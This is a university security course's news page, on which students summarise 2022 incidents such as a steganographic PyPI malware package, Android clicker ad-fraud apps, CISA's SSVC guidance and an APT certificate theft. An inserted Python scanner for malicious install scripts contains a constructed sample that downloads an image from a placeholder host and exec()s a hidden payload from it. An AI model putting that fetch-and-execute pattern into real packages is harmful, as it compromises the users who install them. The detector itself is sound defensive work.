Protection of Information Assets

Temple University

MIS 5206.001 ■ Fall 2022 ■ David Lanter

In The News

November 9, 2022 by David Lanter 11 Comments

Filed Under: Unit 13: Computer Application Security

Comments

  1. Nishant Shah says

    November 11, 2022 at 2:35 pm

    Malicious Package on PyPI Hides Behind Image Files, Spreads Via GitHub

    A new malicious package has been found on the Python Package Index (PyPI) repository that could hide code in images with a steganographic technique and infect users through open-source projects on Github.

    The code in question was responsible for manually installing additional requirements, then downloading a picture from the web and using the newly installed package to process the image and trigger the processing generated output using the exec command.

    Findings indicate that PyPI malicious packages and related obfuscation techniques are evolving rapidly. To protect against attacks like this, Check Point Research recommends companies use threat code scanners to double-check third-party packages and ensure that ratings on projects on GitHub are not synthetically generated.

    https://www.infosecurity-magazine.com/news/malicious-package-pypi-hides-image/

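The scanner recommendation in the comment above can be illustrated with a small static check; this is an added example, not part of the original comment and not Check Point's tooling. The sample script, the `example_image_lib` package, the `example.invalid` URL and the rule names are all constructed assumptions.

```python
import ast

# Constructed sample resembling the install-time pattern described above
# (placeholder names; not taken from the real package).
SAMPLE_SETUP = '''
import os
os.system("pip install example-image-lib")
import requests
from example_image_lib import reveal
open("pic.png", "wb").write(requests.get("https://example.invalid/pic.png").content)
exec(reveal("pic.png"))
'''
BENIGN_SETUP = 'from setuptools import setup\nsetup(name="demo", version="1.0")\n'

SHELL_CALLS = {"os.system", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_call"}
FETCH_CALLS = {"requests.get", "urllib.request.urlopen", "urllib.request.urlretrieve"}

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else ''."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def scan(source):
    """Return sorted (line, finding) pairs; parses the code, never runs it."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name, args = dotted(node.func), node.args
        if name in ("exec", "eval") and args and not isinstance(args[0], ast.Constant):
            findings.append((node.lineno, "dynamic-exec"))
        elif name in SHELL_CALLS:
            text = ast.unparse(args[0]) if args else ""
            kind = "installs-package" if "pip" in text and "install" in text else "shell-command"
            findings.append((node.lineno, kind))
        elif name in FETCH_CALLS:
            findings.append((node.lineno, "network-fetch"))
    return sorted(findings)

def verdict(source):
    """'suspicious' when remote content is fetched and dynamic code is executed."""
    kinds = {kind for _, kind in scan(source)}
    return "suspicious" if {"network-fetch", "dynamic-exec"} <= kinds else "review" if kinds else "clean"
```

Matching is by call name only, so aliased imports (`from os import system`) slip past it; treat a "clean" verdict as one signal among several, not as clearance.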
  2. Frank Kofi Kpotivi says

    November 13, 2022 at 3:02 pm

    Top Cyber Attacks of 2020
    During the coronavirus pandemic, a big portion of the population switched to working, buying, studying, and watching content online. As a result, cybercriminals now have more access to potential victims than ever before.

    The term “Zoombomb” was coined when hackers would break into a private Zoom meeting or online class and shout profanities and racist epithets or flash pornographic images. In an effort to politicize the coronavirus pandemic, nation-state hacker groups launched assaults against organizations working to contain it, including the World Health Organization and the Centers for Disease Control and Prevention.
    In response to the massive economic precarity caused by the epidemic, even commonplace cyberattacks like email phishing, social engineering, and refund fraud took on a darker character.

    https://thehackernews.com/2021/01/top-cyber-attacks-of-2020.html

  3. Sunam Rijal says

    November 13, 2022 at 8:38 pm

    Secure Coding Practices for Developers
    https://blog.convisoappsec.com/en/secure-coding-practices-for-developers/
    This blog talks about secure coding practices for developers, and it also highlights the problems that may occur when launching a product without reviewing or testing its code for performance and security.
    • Clean and check all entries
    • Don’t keep secrets in code
    • Check for vulnerabilities in dependencies and external packages
    • Apply secure authentication
    • Apply the principle of least privilege

  4. Aayush Mittal says

    November 13, 2022 at 10:04 pm

    Clicker Malware Garners Estimated 20 Million Downloads

    “Clicker” malware designed to facilitate ad fraud has been found on 16 mobile apps in the Google Play store, according to McAfee. Detected as Android/Clicker, the malware was inserted into legitimate-looking utility apps such as flashlights, QR readers, cameras, unit converters and task managers.
    Once the application is opened, it downloads its remote configuration by executing an HTTP request. After the configuration is downloaded, it registers the FCM (Firebase Cloud Messaging) listener to receive push messages. The malware forces infected devices to visit and browse certain websites in the background, without the user’s knowledge.
    After being notified by the security vendor, Google has removed the offending apps, which are estimated to have garnered as many as 20 million downloads.

    https://www.infosecurity-magazine.com/news/clicker-malware-20-million/

  5. Chinenye Marylyn Akinola says

    November 14, 2022 at 1:48 am

    Qatar World Cup Firms Urged to Upgrade Cyber-Threat Model

    Organizing bodies and key partners of the FIFA World Cup in Qatar this autumn have been warned to enhance their resilience against a potential barrage of cyber-threats.

    Threat intelligence firm Digital Shadows claimed that the world’s most-watched sporting event would invite scrutiny from a variety of threat actors.

    “Scams could present themselves in many forms. For instance, financially motivated threat actors often plant in malicious URLs spoofing these events to fraudulent sites, hoping to maximize their chances of scamming naive internet users for a quick profit,” it warned in a blog post.

    “At the same time, hacktivist groups may exploit the public attention given to such events to exponentially increase the reach of their message. State-sponsored advanced persistent threat (APT) groups may also decide to target global sporting events like the Qatar 2022 World Cup to achieve state goals to the hosting country or the broader event community.”

    Digital Shadows urged organizations to take a risk-based approach to cybersecurity ahead of the event, focusing on cyber-hygiene best practices such as regular patching, multi-factor authentication (MFA) and phishing awareness.

    “A risk-based approach enables your organization to adapt its cybersecurity program to specific needs and vulnerabilities by considering the potential impact of a certain phenomenon and its likelihood,” it concluded.

    https://www.infosecurity-magazine.com/news/qatar-world-cup-firms-upgrade/

  6. Mengqi Xiong says

    November 16, 2022 at 7:19 pm

    CISA has published guidance for the Stakeholder-Specific Vulnerability Classification (SSVC), which is a vulnerability management approach that assesses vulnerabilities and prioritizes remediation based on the development status, security impact, and prevalence of affected products in a single system. Executive Assistant Director (EAD) Eric Goldstein claims that implementing methodologies such as SSVC is a key step in advancing the vulnerability management ecosystem: CISA’s Known Exploited Vulnerabilities (KEV) catalog, Common Security Advisory Framework (CSAF) and Vulnerability Exploitability Exchange (VEX) are used in conjunction with SSVC to further reduce the window for cyber threat actors to exploit U.S. networks. There is an urgent need for a standardized method for vendors to disclose security vulnerabilities to end users in an accelerated and automated manner, particularly during intense commercial periods such as the holidays. CISA encourages organizations to use its version of SSVC for vulnerability management. SSVC provides a customized decision tree model that helps companies prioritize vulnerability responses.

    https://www.securitymagazine.com/articles/98611-cisa-releases-vulnerability-management-methodology

  7. Pranavi Yadalam Sekhar says

    November 16, 2022 at 7:35 pm

    Two men jailed in US for $6m cyber fraud scam

    For their involvement in the Nigerian-run business, George Ugochukwu Egwumba, 47, of Cypress, and Princewell Arinze Duru, 33, of Sacramento, received sentences of more than 10 years apiece from different California courts.

    In June, both men were found guilty of wire fraud and money laundering. The scheme saw victims, including elderly ones, being defrauded of at least $6 million, and there are currently 80 suspects in custody. They are only two of them.

    The Department of Justice (DoJ), which announced the sentencing, stated that “members of the conspiracy, many of whom were situated in Nigeria, used middlemen to communicate with their fellow co-conspirators stationed in the United States.”

    The scheme involved “a wide range of frauds, including frauds involving business email compromise (BEC), romance scams, elder fraud, and fraud employing.

    Through US bank accounts, money-transfer services like Western Union or MoneyGram, or cryptocurrencies, “the US-based middlemen participated in receiving and laundering the proceeds of the frauds.”

    While engaging in fraud himself “using malware and other cybercrime tools,” Egwumba obtained bank account information from collaborators to give to further criminals. He obtained bank account information from his fellow thieves through chat messages, which he then utilized to accept stolen money.

    By opening fictitious company bank accounts, employing money-transfer services, and using cryptocurrency wallets, Duru assisted his fellow cybercriminals in receiving and laundering the proceeds of their crimes.

    One of the ringleaders, Chuks Eroha, 42, is still at large and is thought to have fled to Nigeria after the Federal Bureau of Investigation issued a warrant for his arrest in 2017. The US authorities have so far obtained 19 guilty pleas in connection with the cyber fraud operation.

    https://cybernews.com/news/two-men-jailed-for-cyber-fraud-scam/

  8. Asha Kunchakarra says

    November 16, 2022 at 8:40 pm

    https://www.darkreading.com/application-security/misconfigurations-vulnerabilities-found-in-95-of-applications

    Almost all applications these days have at least one vulnerability or misconfiguration that affects security. While many of the misconfigurations and vulnerabilities are considered to be of medium severity or less, at least 25% are rated highly or critically severe. “This really just points out that, [while] organizations may be doing a good job performing static scans to lower the number of coding vulnerabilities, they are not taking configuration into account, as it may be more difficult.” The data argues for the benefits of using multiple tools to analyze software for vulnerabilities and misconfigurations. Synopsys released data from a variety of different tests with each having similar top offenders. Weak configurations of encryption technology — namely, Secure Sockets Layer (SSL) and Transport Layer Security (TLS) — topped the charts for static, dynamic, and mobile application security tests, for example. Static and dynamic testing as well as software composition analysis (SCA) all have advantages and should be used together to have the highest chance to detect potential misconfigurations and vulnerabilities, says Synopsys’s Kelly. “These types of issues can be found in the early stages of the software development lifecycle (SDLC), such as the development and DevOps phases, which reduces the number that make it into production,” he says.

  9. Wei Zhang says

    November 16, 2022 at 10:13 pm

    I’d like to share some vulnerability scanners:
    – Acunetix
    Acunetix is a Web vulnerability scanner with advanced crawling technology that looks for vulnerabilities to search all types of web pages, even those that are password-protected.
    – BeSECURE
    BeSECURE can continuously scan for network and application vulnerabilities, with daily updates and specialized testing methods capturing 99.99% of detectable vulnerabilities.
    – Nessus
    Nessus is a remote security scanning tool that scans a computer and alerts it if it finds any vulnerabilities.
    – Burp Suite
    Burp Suite is a constantly evolving vulnerability scanning tool that provides integrations for easy ticket generation.

    https://www.coresecurity.com/blog/top-14-vulnerability-scanners-cybersecurity-professionals

  10. Shadrack Owusu says

    November 16, 2022 at 11:01 pm

    A live stream failing in Nevada is “one of the ways blue states steal elections.”

    About a week ago, a computer application security incident occurred in Washoe County in Nevada. It has been reported that Washoe County went dark overnight on November 9, 2022. Due to the sequence of events, there are claims on social media alleging the officials were involved in some sort of wrongdoing to alter the election results.
    The live stream computer application lost connection with the courtesy cameras at 11:24 p.m. on the evening of November 9. Surprisingly, all staff had left for the night about 60 minutes prior to the incident and did not arrive back at the office until 7 a.m. the next day. The connection was restored at 7:53 a.m. on the morning of November 10.
    One of the recommendations to mitigate the risk documented on the county’s website is to look for a solution that would prevent software disruptions in the future or avoid a courtesy live stream feed. They believe that it will maintain transparency and minimize unnecessary speculation about interference with elections.

    https://www.politifact.com/factchecks/2022/nov/16/instagram-posts/nevada-ballot-counting-livestream-went-dark-but-vo/
    https://washoelife.washoecounty.gov/washoe-county/registrar-of-voters-livestream-cameras/

  11. Elizaveta Ibeme says

    November 16, 2022 at 11:57 pm

    APT hackers compromised several countries’ digital certificate authorities and other government agencies with the intent to steal legitimate digital certificates. It was done using penetration testing tools. A loader malware created a back door that allowed the threat actors to access the victim’s network.

    https://cybersecuritynews.com/billbug-apt-malware/

